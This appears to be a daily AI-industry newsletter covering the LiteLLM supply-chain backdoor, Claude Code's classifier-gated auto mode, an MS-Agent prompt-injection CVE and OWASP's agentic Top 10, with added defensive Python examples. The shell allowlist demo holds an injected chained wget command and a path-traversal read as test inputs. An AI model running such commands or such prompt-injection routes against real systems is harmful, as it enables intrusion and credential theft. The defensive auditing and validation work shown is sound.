
Ramsay Research Agent — March 24, 2026

[2026-03-24] -- 4,182 words -- 21 min read


Top 5 Stories Today

1. LiteLLM Got Backdoored. The Attack Vector? Their Own Security Scanner.

Every Python process on your machine just became a potential credential exfiltration endpoint if you installed the wrong version of LiteLLM today.

LiteLLM versions 1.82.7 and 1.82.8, published to PyPI on March 24, contained a malicious .pth file that executes automatically on every Python startup. Not on import. On startup. The payload dumps environment variables, queries cloud metadata endpoints (IMDS for AWS/GCP/Azure), and collects SSH keys, cloud credentials, Kubernetes configs, and crypto wallets, then encrypts the haul with AES-256-CBC and exfiltrates it to a lookalike domain. LiteLLM gets 3.4 million downloads per day. 97 million monthly. The malicious versions were live for approximately three hours before PyPI quarantined them.
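The startup hook is worth understanding precisely, because it is also what you can audit. CPython's site.py reads every .pth file in a site-packages directory at interpreter start; any line beginning with "import " is exec()'d as Python, every other non-comment line is just a sys.path entry. The script below is an added example (not code from the newsletter or from LiteLLM) that lists the executable lines in your .pth files so a human can review them. Legitimate packages (editable installs, the setuptools distutils shim) also use import lines, so a hit is a review item, not a verdict; the indicator list is a heuristic I chose for this example.

```python
"""Audit .pth files for lines the interpreter will execute at startup.

site.py treats any .pth line that begins with "import " (or "import\\t") as
code and exec()s it on every interpreter start; all other non-blank,
non-comment lines are paths appended to sys.path. This lists the former.
"""
import site
import sys
from pathlib import Path

# Review aids chosen for this example, not a signature set: substrings that
# make an import line worth a closer look.
INDICATORS = ("exec(", "eval(", "base64", "urllib", "socket", "subprocess",
              "os.environ", "compile(", "\\x", "zlib")


def classify_pth_text(text):
    """Return [(lineno, line, [indicators])] for every executable line in a .pth body."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue                      # blank or comment: ignored by site.py
        if not line.startswith(("import ", "import\t")):
            continue                      # plain sys.path entry: never executed
        hits = [ind for ind in INDICATORS if ind in line]
        if len(line) > 200:               # loaders tend to be long one-liners
            hits.append("long_line")
        findings.append((lineno, raw, hits))
    return findings


def audit_directory(directory):
    """Map each .pth file directly under `directory` to its executable lines."""
    results = {}
    for pth in sorted(Path(directory).glob("*.pth")):
        findings = classify_pth_text(pth.read_text(encoding="utf-8", errors="replace"))
        if findings:
            results[str(pth)] = findings
    return results


def site_directories():
    """Every directory site.py scans for .pth files in this interpreter."""
    dirs = []
    if hasattr(site, "getsitepackages"):
        dirs.extend(site.getsitepackages())
    dirs.append(site.getusersitepackages())
    return [d for d in dirs if Path(d).is_dir()]


if __name__ == "__main__":
    # Usage: python audit_pth.py [site-packages dir ...]; defaults to this interpreter's dirs.
    for directory in sys.argv[1:] or site_directories():
        for path, findings in audit_directory(directory).items():
            for lineno, line, hits in findings:
                flag = "REVIEW" if hits else "exec"
                print(f"{flag:6} {path}:{lineno} {line[:120]}  indicators={hits}")
```

Run it inside every virtualenv and container image you ship, not just on your workstation: the .pth mechanism fires for whichever interpreter owns the directory, which is why a CI runner that merely installed the package was enough to lose its credentials.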

Here's what caught me off guard: the attack didn't start with LiteLLM. Threat actor TeamPCP first compromised Aqua Security's Trivy GitHub Action on March 19. Trivy. The vulnerability scanner. They compromised the tool that's supposed to catch this exact kind of thing, then used the CI/CD credentials it had access to in LiteLLM's pipeline to publish the poisoned packages directly to PyPI. They also hit Checkmarx and KICS GitHub Actions. Five days from scanner compromise to package backdoor.

This is a new pattern and it's ugly. Compromising a security scanner gives you access to everything it scans. It's the supply chain attack equivalent of stealing a master key from the locksmith. Your security tooling is now an attack surface, not just a defense layer.

The actionable response is already shipping across the package manager ecosystem. Simon Willison documented the cooldown features now production-ready: pnpm minimumReleaseAge (v10.16), Yarn npmMinimalAgeGate (v4.10), npm min-release-age (v11.10), and Bun's equivalent. A conservative 60-day setting would have completely blocked this attack. The malicious versions existed for 3 hours. Even a 24-hour cooldown would have saved you. Set this in your package manager config today. Not tomorrow. Right now. If you're running LiteLLM in production, audit your CI/CD pipeline for Trivy GitHub Actions and check whether versions 1.82.7 or 1.82.8 ever touched your environment.
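What every one of those settings does is the same small check, and it is worth having it in a form you can run against any registry, including PyPI, which has no equivalent flag yet. The following is an added example (my code, not Simon Willison's or any package manager's): given a version-to-upload-time mapping, it picks the newest version that has cleared a cooldown. The timeline is constructed to mirror the story (two poisoned versions about three hours old, one older good release whose version number "1.81.0" and all timestamps are invented); PyPI exposes the real upload times under releases[version][*]["upload_time_iso_8601"] in its JSON API, and the npm registry under its "time" object.

```python
"""Apply a release-age cooldown to package metadata before choosing a version."""
from datetime import datetime, timedelta, timezone


def parse_iso(ts):
    """Parse an ISO-8601 timestamp, accepting a trailing 'Z' for UTC."""
    if ts.endswith("Z"):
        ts = ts[:-1] + "+00:00"
    dt = datetime.fromisoformat(ts)
    return dt if dt.tzinfo else dt.replace(tzinfo=timezone.utc)


def release_age(upload_time, now):
    """Age of one release as a timedelta at instant `now`."""
    return now - parse_iso(upload_time)


def eligible_versions(releases, min_age_hours, now):
    """Versions uploaded at least `min_age_hours` before `now`."""
    floor = timedelta(hours=min_age_hours)
    return {v: t for v, t in releases.items() if release_age(t, now) >= floor}


def newest_eligible(releases, min_age_hours, now):
    """Most recently uploaded version that cleared the cooldown, or None.

    None is the fail-closed answer: a package whose every release is younger
    than the cooldown must not silently fall back to the newest one.
    """
    ok = eligible_versions(releases, min_age_hours, now)
    if not ok:
        return None
    return max(ok, key=lambda v: parse_iso(ok[v]))


# Constructed timeline: version "1.81.0" and every timestamp are invented.
NOW = datetime(2026, 3, 24, 21, 0, tzinfo=timezone.utc)
RELEASES = {
    "1.81.0": "2026-03-12T09:15:00Z",   # last good release (constructed)
    "1.82.7": "2026-03-24T18:02:00Z",   # poisoned, ~3h old at NOW
    "1.82.8": "2026-03-24T19:40:00Z",   # poisoned, ~1.3h old at NOW
}

if __name__ == "__main__":
    for label, hours in (("none", 0), ("24h", 24), ("60d", 60 * 24)):
        print(f"cooldown={label:5} -> install {newest_eligible(RELEASES, hours, NOW)}")
```

The 60-day row is the edge case to notice: with only a recent good release available, a strict cooldown resolves nothing, and the right behaviour is to fail the install and page a human rather than quietly relax the window.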


2. Claude Code Auto Mode Kills the Permission Fatigue Problem

If you've used Claude Code for any serious session, you know the drill. Approve. Approve. Approve. Approve. You stop reading the prompts after the fifteenth one. That's the worst possible security outcome, way worse than a well-designed automated check.

Anthropic launched auto mode today, and it's the first permission model for coding agents that actually makes sense. A Sonnet 4.6 classifier reviews every single tool call before execution, blocking destructive actions (mass file deletion, data exfiltration, malicious code execution) while letting safe operations proceed without interruption. It sits between the conservative default permissions and the terrifying --dangerously-skip-permissions flag that I've seen way too many people casually recommend on Reddit.

Simon Willison's analysis breaks down the architecture in detail. The classifier-as-guardrail pattern is the key insight here. You've got a fast, cheap model (Sonnet 4.6) gating every action by a more capable, expensive model (Opus 4.6). The fast model isn't doing the work. It's reviewing the work for safety. This is the same dual-model pattern that's been emerging in production agent systems for months, but Anthropic is the first to ship it as a first-party feature in a coding tool.

The r/ClaudeAI community response was telling. 308 upvotes, 129 comments, and the comment ratio (0.42) was the highest of any Claude Code post today. People are genuinely debating whether classifier reliability is sufficient, whether adversarial prompt injection through tool outputs could bypass it, and whether normalizing reduced human oversight creates a ratchet effect. These are the right questions.

Enable it if you're on Teams plan: claude --enable-auto-mode or Settings > Claude Code > permission mode in VS Code. It adds slight latency and token overhead from the classifier pass. My recommendation: use it in isolated environments (containers, worktrees) for long-running tasks where permission fatigue is a real risk. This pattern will spread. Cursor, Codex, and Windsurf all face the same UX friction. Expect copycat implementations within weeks.


3. Anthropic Published How They Actually Build With Claude Code. It's Two Agents, Not One.

The most useful engineering blog post I've read this year dropped today with zero fanfare.

Anthropic's engineering team published the actual architecture they use for long-running autonomous coding: a two-agent harness where an initializer agent sets up the project environment (init scripts, feature lists, progress logs) and a coding agent works incrementally across multiple context windows. The memory bridge between them? A plain text file called claude-progress.txt. Not a vector database. Not a knowledge graph. A text file.

The specifics are what make this valuable. They expand prompts into 200+ discrete end-to-end features tracked in a JSON structure. Each feature has a defined scope, acceptance criteria, and verification method. Puppeteer-based browser testing runs automatically to verify UI features. The coding agent reads the progress file at the start of each context window, picks up where the previous session left off, and updates the file when done. It's embarrassingly simple and that's exactly why it works.
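To make the bookkeeping concrete, here is an added example of the progress-file loop (my code, not Anthropic's harness). It assumes the shape the post describes: a feature list kept as JSON with id, description, acceptance criteria and status, and a plain-text claude-progress.txt that each session reads first and appends one line to at the end. The file name features.json, the field names and the sample features are my choices.

```python
"""Minimal progress-file bookkeeping for a two-agent coding harness."""
import json
from datetime import datetime, timezone
from pathlib import Path

FEATURES_FILE = "features.json"          # assumed name
PROGRESS_FILE = "claude-progress.txt"    # name from the post


def new_state(descriptions):
    """Expand (id, description, acceptance) tuples into tracked features."""
    return {"features": [
        {"id": fid, "description": desc, "acceptance": acc, "status": "todo"}
        for fid, desc, acc in descriptions]}


def next_feature(state):
    """First feature not yet done: the unit of work for one context window."""
    for feat in state["features"]:
        if feat["status"] != "done":
            return feat
    return None


def complete_feature(state, feature_id, verified_by):
    """Mark a feature done and record how it was verified; returns the feature."""
    for feat in state["features"]:
        if feat["id"] == feature_id:
            if feat["status"] == "done":
                raise ValueError(f"{feature_id} already done")
            feat["status"] = "done"
            feat["verified_by"] = verified_by
            return feat
    raise KeyError(feature_id)


def progress_line(state, feature, note, when=None):
    """One append-only line for claude-progress.txt."""
    when = when or datetime.now(timezone.utc)
    done = sum(f["status"] == "done" for f in state["features"])
    return f"[{when:%Y-%m-%dT%H:%MZ}] {done}/{len(state['features'])} done | {feature['id']}: {note}"


def session_prompt(state, progress_text):
    """What the coding agent reads at the start of a fresh context window."""
    feat = next_feature(state)
    if feat is None:
        return "All features complete. Run the full verification suite and stop."
    recent = "\n".join(progress_text.strip().splitlines()[-5:])
    return (f"Recent progress:\n{recent or '(none)'}\n\n"
            f"Next feature {feat['id']}: {feat['description']}\n"
            f"Acceptance: {feat['acceptance']}\n"
            "Implement it, verify it, then append one line to the progress file.")


def save(state, root="."):
    Path(root, FEATURES_FILE).write_text(json.dumps(state, indent=2))


def load(root="."):
    return json.loads(Path(root, FEATURES_FILE).read_text())


def run_demo():
    """Simulate one session: read state, finish one feature, log it."""
    # Constructed feature list standing in for the post's 200+ entries.
    state = new_state([
        ("F001", "User can sign up with email", "POST /signup returns 201; user row exists"),
        ("F002", "User can log in", "POST /login returns a session cookie"),
    ])
    log = ""
    first_prompt = session_prompt(state, log)
    complete_feature(state, "F001", "puppeteer: signup_flow.spec")
    log += progress_line(state, state["features"][0], "signup done, tests green",
                         when=datetime(2026, 3, 24, 10, 0, tzinfo=timezone.utc)) + "\n"
    return state, log, first_prompt


if __name__ == "__main__":
    state, log, _ = run_demo()
    print(log, end="")
    print(session_prompt(state, log))
```

The important property is that the progress file is append-only and the feature list is the only mutable state: a session that dies mid-feature leaves the feature marked todo and the next window simply picks it up again.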

This post generated 3,460 likes and 435K views. That engagement isn't because people found it interesting. It's because people found it useful. I've already started adapting the pattern for my own projects. The progress file approach solves the most painful problem with long-running agent sessions: context loss between windows. I've been doing something similar with CLAUDE.md files, but the structured JSON feature tracking is a level up.

The broader signal: "harness engineering" is becoming a real discipline. The agent itself is a commodity. The harness around it, the scaffolding that manages context, tracks progress, verifies outputs, that's where the craft is. If you're building anything with autonomous coding agents, read this post and steal the architecture. It's production-tested by the team that built the model.


4. A Local Knowledge Graph Just Cut My Claude Code Token Bill by 49x

This is the install-this-today story.

code-review-graph (3.5K GitHub stars) builds a persistent AST-based knowledge graph of your codebase using Tree-sitter, then queries it at review time to compute the minimal context set Claude actually needs. On a 27,732-file Next.js monorepo, it reduced review context from 739,000 tokens to approximately 15,000. That's a 49x reduction. Not a typo.

The counterintuitive part: review quality went up, not down. The tool scored 8.8 on a ten-point quality scale versus 7.2 for full-context reviews. Less noise means better signal. Claude isn't sifting through thousands of irrelevant files to find the three that matter. The knowledge graph already knows the dependency chain, the call graph, and the file relationships. It hands Claude exactly what it needs and nothing else.
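The mechanism is easy to reproduce in miniature, which is the best way to see why quality can go up when context goes down. The following is an added example, not code-review-graph's implementation: it uses Python's stdlib ast instead of Tree-sitter and only resolves module-level imports, but it does the same thing structurally, indexing the repo once into a dependency graph and then handing the reviewer only the changed files plus their imports and importers within a chosen radius. The sample repository is constructed.

```python
"""Compute a minimal review context from an import dependency graph."""
import ast
from collections import deque


def module_name(path):
    """'app/auth.py' -> 'app.auth'; 'app/__init__.py' -> 'app'."""
    parts = path[:-3].split("/")
    if parts[-1] == "__init__":
        parts.pop()
    return ".".join(parts)


def import_candidates(source, current_module):
    """Dotted names a file may depend on ('pkg' and 'pkg.name' for from-imports)."""
    names = set()
    package = current_module.rpartition(".")[0]
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            names.update(alias.name for alias in node.names)
        elif isinstance(node, ast.ImportFrom):
            base = node.module or ""
            if node.level:                         # relative import: climb level-1 packages
                parts = package.split(".") if package else []
                parts = parts[:len(parts) - (node.level - 1)]
                base = ".".join(parts + ([node.module] if node.module else []))
            if base:
                names.add(base)
            names.update(f"{base}.{a.name}" if base else a.name for a in node.names)
    return names


def build_graph(files):
    """files: {path: source} -> {path: set(paths it imports inside the repo)}."""
    by_module = {module_name(p): p for p in files}
    graph = {}
    for path, source in files.items():
        deps = set()
        for name in import_candidates(source, module_name(path)):
            while name and name not in by_module:  # 'app.crypto.hash_pw' -> 'app.crypto'
                name = name.rpartition(".")[0]
            if name and by_module[name] != path:   # stdlib/third-party resolve to '' and drop out
                deps.add(by_module[name])
        graph[path] = deps
    return graph


def reverse(graph):
    rev = {p: set() for p in graph}
    for src, deps in graph.items():
        for d in deps:
            rev[d].add(src)
    return rev


def neighbourhood(adjacency, start, depth):
    """Nodes reachable from `start` within `depth` hops, excluding `start` itself."""
    seen, frontier = set(), deque((s, 0) for s in start)
    while frontier:
        node, d = frontier.popleft()
        if d == depth:
            continue
        for nxt in adjacency.get(node, ()):
            if nxt not in seen and nxt not in start:
                seen.add(nxt)
                frontier.append((nxt, d + 1))
    return seen


def review_context(files, changed, upstream=1, downstream=1):
    """Changed files + what they import (upstream) + what imports them (downstream)."""
    graph, changed = build_graph(files), set(changed)
    ctx = changed | neighbourhood(graph, changed, upstream) \
                  | neighbourhood(reverse(graph), changed, downstream)
    return sorted(ctx)


# Constructed sample repository.
REPO = {
    "app/__init__.py": "",
    "app/crypto.py":   "import hashlib\n\ndef hash_pw(p):\n    return hashlib.sha256(p.encode()).hexdigest()\n",
    "app/auth.py":     "from app import crypto\n\ndef login(pw):\n    return crypto.hash_pw(pw)\n",
    "app/api.py":      "from . import auth\n\ndef handler(pw):\n    return auth.login(pw)\n",
    "app/billing.py":  "from .crypto import hash_pw\n",
    "app/reports.py":  "import csv\n",
}

if __name__ == "__main__":
    ctx = review_context(REPO, ["app/crypto.py"])
    print(f"{len(ctx)}/{len(REPO)} files in context:", ctx)
```

Note what the downstream radius buys a security review specifically: a change to crypto.py drags in auth.py and billing.py, the two callers whose behaviour the change can break, while reports.py, which shares nothing with it, never reaches the model at all.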

It ships as a Claude Code plugin with incremental updates on git commits. Zero workflow change required. Your knowledge graph stays current as you work. At current Opus 4.6 pricing, going from 739K to 15K tokens per review on a large repo is the difference between "I need to think about whether this review is worth the cost" and "I don't even notice the cost."

I'm installing this on my largest project today. If you're running Claude Code on anything bigger than a toy repo, the ROI is immediate. The combination of this tool with the Anthropic compaction API (compact-2026-01-12) could make context management a solved problem for most codebases. We're not there yet, but the pieces are falling into place.


5. OWASP Just Shipped the Security Checklist Every Agent Team Needs

The first canonical security framework for agentic applications is here, and the timing couldn't be better.

OWASP released the Top 10 for Agentic Applications 2026, developed with over 100 security experts. ASI01 Agent Goal Hijacking leads the list, and if you've been following today's other stories, you already know why. Attackers manipulate agent objectives through poisoned inputs because agents can't reliably distinguish instructions from data. The LiteLLM attack (story #1) is a textbook case of ASI02 Tool Misuse & Exploitation. Claude Code's auto mode classifier (story #2) is specifically designed to guard against ASI01.

A Dark Reading poll shows 48% of security professionals now rank agentic AI as the #1 attack vector for 2026. That's higher than deepfakes. Higher than ransomware. The full list covers Identity & Privilege Abuse (ASI03), Excessive Autonomy (ASI04), Improper Output Handling (ASI05), and all the way to Rogue Agents (ASI10), which is the nightmare scenario where an agent starts operating outside its intended parameters with no human in the loop.

What makes this different from yet another security framework: it's specific to agents, not LLMs generally. The threat model accounts for tool use, multi-step reasoning, autonomous decision-making, and inter-agent communication. These are fundamentally different attack surfaces than prompt injection against a chatbot.

If you're shipping agents to production, print this list and tape it to your monitor. Map each of your agents against all ten categories. The uncomfortable reality is that most teams I've talked to are addressing maybe two or three of these. The other seven are open attack surfaces they haven't thought about.


Section Deep Dives

Security

UK government finds a scaling law for AI cyberattacks. Import AI 450 reports that at a fixed 10M token budget on a corporate network range, average attack steps completed rose from 1.7 (GPT-4o, August 2024) to 9.8 (Opus 4.6, February 2026). Nearly 6x improvement in autonomous offensive capability in 18 months. Best single runs completed 22 of 32 attack steps in 6 hours versus 14 hours for human experts. Defensive infrastructure needs to plan for AI-augmented adversaries as a near-term certainty, not a hypothetical.

MS-Agent CVE-2026-2256: prompt injection to full system compromise. SecurityWeek reported that Alibaba's MS-Agent framework allows attackers to achieve arbitrary OS command execution through prompt injection that triggers unsanitized shell execution. The regex-based command blacklist is trivially bypassed. CERT/CC confirmed no vendor patch exists. If you're using MS-Agent with any untrusted inputs (documents, logs, research data), you're exposed.
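The general lesson is that a blacklist over a command string fails open, while an allowlist over parsed arguments fails closed. The code below is an added example of the latter for an agent's shell tool; it has nothing to do with MS-Agent's code base and the permitted commands are my choice. The string is tokenised with shlex, never handed to a shell, and runs only if the program and subcommand are explicitly permitted and every path argument (including values of --flag=path options) resolves inside the workspace.

```python
"""Allowlist-based validation for shell commands issued by an agent."""
import shlex
import subprocess
from pathlib import Path

# Program -> permitted first argument; None means "no subcommand required".
ALLOWED = {
    "ls": {None}, "cat": {None}, "grep": {None}, "pytest": {None},
    "git": {"status", "diff", "log", "show"},
}
MAX_ARGS = 32


class CommandRejected(ValueError):
    pass


def validate_command(cmdline, workspace="."):
    """Return argv for `cmdline` or raise CommandRejected. Never invokes a shell."""
    try:
        argv = shlex.split(cmdline)
    except ValueError as e:                          # unbalanced quotes etc.
        raise CommandRejected(f"unparseable: {e}")
    if not argv or len(argv) > MAX_ARGS:
        raise CommandRejected("empty or too many arguments")
    prog = argv[0]
    if prog not in ALLOWED:                          # 'ls;' and '/bin/ls' are not 'ls'
        raise CommandRejected(f"program not allowed: {prog!r}")
    sub = argv[1] if len(argv) > 1 and not argv[1].startswith("-") else None
    if None not in ALLOWED[prog] and sub not in ALLOWED[prog]:
        raise CommandRejected(f"subcommand not allowed: {prog} {sub!r}")
    # Every non-flag argument, and every --flag=value, is treated as a path that
    # must stay inside the workspace. Flags without values are not inspected,
    # so a real deployment should allowlist those per command as well.
    root = Path(workspace).resolve()
    candidates = []
    for arg in argv[1:]:
        if arg.startswith("-"):
            if "=" in arg:
                candidates.append(arg.split("=", 1)[1])
        else:
            candidates.append(arg)
    for value in candidates:
        p = Path(value)
        p = p.resolve() if p.is_absolute() else (root / p).resolve()
        if root not in (p, *p.parents):
            raise CommandRejected(f"path escapes workspace: {value!r}")
    return argv


def is_allowed(cmdline, workspace="."):
    """Boolean form of validate_command for callers that only need a verdict."""
    try:
        validate_command(cmdline, workspace)
        return True
    except CommandRejected:
        return False


def run_validated(cmdline, workspace=".", timeout=30):
    """Validate, then execute without a shell; returns (returncode, stdout)."""
    argv = validate_command(cmdline, workspace)
    proc = subprocess.run(argv, cwd=workspace, capture_output=True, text=True,
                          timeout=timeout, shell=False)
    return proc.returncode, proc.stdout


if __name__ == "__main__":
    for cmd in ("git status", "git push origin main", "ls; wget http://example.invalid/x",
                "cat ../../etc/hosts", "grep -n TODO src/main.py"):
        print(f"{'ALLOW' if is_allowed(cmd) else 'REJECT':6} {cmd}")
```

Every rejection here comes from something missing from the allowlist rather than something matched against a pattern, which is why the injected chained command is stopped without anyone having to anticipate the exact string it would use.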

Security audit of 22,511 AI agent skills found 140,963 issues. The New Stack uncovered a gap between what package registries scan and what actually runs on developer machines. Skills execute with agent-level permissions and often bypass conventional security scanning entirely. The agent skill ecosystem has a fundamentally different threat model than npm packages, and we don't have the tooling to match.

Self-propagating malware targets open-source packages, wipes Iranian machines. Ars Technica reports on malware that compromises legitimate packages and specifically destroys data on machines with Iranian locale settings. Combined with the LiteLLM/TeamPCP campaign, March 2026 is shaping up as the worst month for open-source supply chain attacks on record.

Agents

Oracle ships 22 Fusion Agentic Applications. Oracle launched coordinated AI agent teams inside Fusion Cloud spanning HCM, ERP, SCM, and CX. The no-code Agentic Applications Builder and workflow orchestration ship at no additional cost to existing Fusion customers with 63,000 certified experts. Oracle embedding agents into ERP at zero incremental cost puts pressure on every standalone SaaS vendor charging separately for AI features.

Dapr Agents v1.0 goes GA at KubeCon Europe. CNCF announced the general availability of Dapr Agents, providing durable workflows and state management that survives process deaths, node restarts, and network drops. ZEISS Vision Care presented a production deployment. If you need agent durability guarantees in Kubernetes, this is the first CNCF-blessed option.

Code review agents solve only ~40% of real review tasks. c-CRAB, a new benchmark from NUS, tested PR-agent, Devin, Claude Code, and Codex on actual human pull request reviews. The ~40% solve rate reveals a hidden trade-off between issue resolution and spurious findings. We're not close to automated code review replacing humans. Not yet.

Cisco ships DefenseClaw for agent security. Cisco's RSA 2026 announcement includes Skills Scanner, MCP Scanner, AI BoM, and Zero Trust Access for AI agents via Duo IAM with MCP policy enforcement. Their survey found 85% of enterprises experiment with agents but only 5% reach production. That gap is a security problem.

Mozilla AI launches CQ: Stack Overflow for agents. CQ is an open-source knowledge commons where coding agents query past learnings before tackling unfamiliar work. One user consumed 170M tokens in 2 days (~$1,700) re-solving known problems. The HN discussion immediately raised poison-pill attack concerns, and they're right to worry. Same day StackOverflow reported a 99% decline in daily questions. The knowledge function is migrating from human Q&A to agent commons.

Research

GPT-5.4 Pro solved a FrontierMath open problem. Sort of. Epoch AI confirmed GPT-5.4 Pro scored 50% on FrontierMath Tiers 1-3 and 38% on Tier 4. But the model appears to have found a 2011 preprint that shortcut the intended work, raising questions about genuine mathematical reasoning versus sophisticated retrieval. The 422-point, 615-comment HN thread was the most intensely debated AI story of the day.

Factory AI's anchored iterative summarization beats OpenAI and Anthropic on context compression. Factory scored 4.04 accuracy versus Anthropic's 3.74 and OpenAI's 3.43 across 36,000 production session messages. The key insight: structured persistent summaries with explicit sections for intent, modifications, decisions, and next steps force preservation. Structure acts as a checklist preventing silent information loss.

METR study: experienced developers 19% slower with AI tools. Time saved on code generation was offset by review, debug, and correction overhead. A separate analysis found AI co-authored code contained 1.7x more major issues and 2.74x higher security vulnerability rates. For experienced developers, AI tools deliver gains primarily on boilerplate, not complex logic. Calibrate accordingly.

50 researchers drop a 303-page field guide on code intelligence. Researchers from ByteDance, Alibaba, and Tencent published a practical guide covering the complete lifecycle of code LLMs. 925 likes, 83K views. The poster noted "the takeaways are not what most people think," suggesting contrarian findings about agent capabilities versus expectations.

Infrastructure & Architecture

ARM ships its own silicon for the first time in 35 years. The AGI CPU: 136 Neoverse V3 cores at 3.7GHz on TSMC 3nm, 300W TDP, 12-channel DDR5-8800, PCIe Gen 6, CXL 3.0. Meta is the lead customer. Seven others including OpenAI, Cloudflare, and SAP. ARM going from IP licensor to silicon vendor is a massive strategic shift. This is the CPU-side orchestration layer for coordinating GPU accelerators in large-scale agent deployments.

Cloudflare Dynamic Workers: 100x faster than containers for agent sandboxing. Dynamic Workers let one Worker spin up another Worker at runtime with AI-generated code, execute it in an isolate, and discard it immediately. Millisecond startup, a few MB of memory. Available to all paid Workers users in open beta. If you need to sandbox untrusted agent code, this is the cheapest and fastest option available right now.

NVIDIA donates GPU DRA driver to Kubernetes community. NVIDIA's KubeCon announcement moves Dynamic Resource Allocation from proprietary to open source. Fine-grained GPU scheduling and sharing across containerized AI workloads becomes a community-owned primitive. About time.

Gimlet Labs raises $80M for cross-chip AI inference. Gimlet runs inference simultaneously across NVIDIA, AMD, Intel, ARM, Cerebras, and d-Matrix chips. If GPU lock-in is your concern, this is the company trying to solve it.

Tools & Developer Experience

Google Workspace gets an official CLI with built-in MCP server. googleworkspace/cli (22.4K stars) is a Rust CLI that dynamically builds its command surface from Google's Discovery Service. Ships a built-in MCP server via npm so any MCP-compatible agent can access Drive, Gmail, Calendar, Sheets, Docs, and Chat. 100+ Agent Skills as SKILL.md files. Hit 10K+ stars in its first week.

Agent Flow visualizes Claude Code's black box in real time. Agent Flow (235 upvotes on r/ClaudeAI) shows how Claude branches decisions, backtracks, and recovers from errors. Auto-configures Claude Code hooks on first launch. If you've ever wondered what Claude Code is actually doing during a long task, install this.

Anthropic Dispatch: text tasks from iPhone, return to finished work on Mac. Dispatch pairs an iPhone with a Mac via QR code, letting you text Claude task instructions from anywhere. Combined with Computer Use, this creates a remote task pipeline for Pro and Max subscribers. I'm still testing how well this works in practice.

Models

GigaChat 3.1 Ultra: 702B MoE under MIT license. Sber released GigaChat-3.1-Ultra-702B (36B active params) with native FP8 training, not post-hoc quantization. Multi-head Latent Attention for compressed KV cache, Multi-Token Prediction for up to 40% faster inference. First serious Russian open-weights competitor at the 702B scale.

OpenAI finishes pretraining 'Spud.' The Information reports Altman told staff the model "can really accelerate the economy." No benchmarks or timeline yet. GPT-5.4 shipped March 5, making this an unusually fast successor cycle. Also: OpenAI's product deployment team was renamed "AGI Deployment." Make of that what you will.

Gemini 3.1 Pro tops SWE-bench but practitioners aren't buying it. 77.1% on ARC-AGI-2, 2887 Elo on LiveCodeBench Pro, 94.3% on GPQA Diamond. But r/singularity users report it's "nowhere near as reliable as Claude Opus 4.6 or GPT 5.4 for real-world coding." AI Explained (107K views) calls this "the downfall of benchmarks." I'm inclined to agree. When the leaderboard winner isn't the tool practitioners choose, the leaderboard is broken.

iPhone 17 Pro runs a 400B parameter model on-device. Developer @anemll demonstrated Qwen3.5-397B-A17B via Flash-MoE SSD-to-GPU streaming. 0.6 tokens/second. Impractical for daily use. Fascinating as a proof of concept that mobile hardware can run frontier-scale models.

Vibe Coding

Claude Computer Use launches on macOS. Anthropic released Computer Use as a research preview for Pro and Max subscribers. Claude can click, scroll, navigate apps, fill spreadsheets, and control the full desktop. 68M views on the announcement tweet. 133K likes. The safety model requires app-level consent, and Pro usage limits are reportedly exhausted within minutes by the token consumption.

Google AI Studio goes full-stack with Firebase integration. The Antigravity coding agent now auto-detects when an app needs a database or auth and provisions Cloud Firestore and Firebase Authentication inline. Firebase Studio is being sunset (accessible until March 2027). Google is consolidating everything into AI Studio as its primary AI-first IDE.

Karpathy hasn't typed code since December. On No Priors, he revealed AI agents now produce 100% of his code. He built "Dobby the House Elf," a WhatsApp-controlled agent unifying his entire smart home through natural language. He described experiencing "claw psychosis" while running 20 parallel agents.

Salesforce hired zero engineers in FY2026. Benioff confirmed a 30%+ productivity increase from AI coding agents. Agentforce grew to $800M. Sales team grew by 20%. The structural workforce shift from engineering to revenue roles is happening at enterprise scale, not just in solo builder shops.

Apple blocks vibe-coded app updates on App Store. MacRumors reports Replit and Vibecode were forced to remove preview features. Apple's own Xcode now integrates OpenAI and Anthropic agentic coding tools. Gatekeeper vibes.

Hot Projects & OSS

ByteDance DeerFlow hits 43.7K stars (+4,346 today). DeerFlow is a SuperAgent harness on LangGraph that spawns parallel sub-agents with scoped context and isolated Docker containers. #1 trending on GitHub.

Project N.O.M.A.D: 15.4K stars for an offline AI survival computer. Self-contained Docker system with local AI via Ollama, offline Wikipedia, Khan Academy, and maps. Requires 32GB RAM and 1TB SSD. Fastest-growing non-agent repo on GitHub.

supermemory: 18.6K stars for the memory API agents need. Universal memory and context layer with plugins for Claude Code, OpenCode, and OpenClaw. Claims #1 on LongMemEval (~99%). Free tier includes 1M tokens/month.

Agent-Reach: 10.6K stars for giving agents internet eyes. Pip-installable tool providing structured search across Twitter, Reddit, YouTube, and GitHub with zero API fees. Cookie-based Twitter auth with no rate limits.

SaaS Disruption

$50B+ deployed to boom-era software companies that haven't raised in 4+ years. Crunchbase analysis reveals a massive cohort of zombie SaaS unicorns facing AI-native competitors from below and impossible IPO economics from above. This capital overhang may never generate returns.

Capital flows to AI infrastructure while application-layer SaaS starves. In a single week: $3.5B (Kleiner Perkins) + $500M (Nexthop AI) + $400M (Replit) + $200M (Axiom Math) = $4.6B+ into AI infrastructure. Meanwhile Salesforce stock is down 30% YTD and Adobe is down 27%.

SaaStr warns: agent drift is the new silent churn. One of their ~30 deployed agents silently degraded, making decisions on stale CRM data. Nobody noticed. Each agent now requires daily monitoring. Agent management consumes 30% of their Chief AI Officer's time.

Policy & Governance

China releases MERLIN, a military electronic warfare AI model. Import AI 450 reports MERLIN outperforms GPT-5, Claude-4-Sonnet, and DeepSeek on electronic warfare reasoning tasks by wide margins. Trained on EM-100K dataset for low-signal-to-noise environments. Open publication from researchers with military affiliations.

Jensen Huang declares "I think we've achieved AGI." On Lex Fridman's podcast, using a definition where an AI can create a billion-dollar business. Satya Nadella countered we're "not anywhere close." Mark Gubrud, who originally coined the AGI acronym, also said current systems match his original vision. The term has become a marketing battleground more than a technical one.

"Is anybody else bored of talking about AI?" hits 560 points on HN. Combined with "So where are all the AI apps?" (382 points) and "The AI industry is lying to you" (146 points), a strong counter-narrative cluster formed today. When the builder audience starts actively pushing back on saturation, the hype cycle may be peaking. I don't think the technology is peaking. The conversation is.

Snowflake eliminates entire 70-person technical writing team. Replaced by "Project SnowWork," an autonomous platform built on their $200M OpenAI partnership. The most concrete enterprise AI displacement event to date. An entire professional discipline, gone.


Skills of the Day

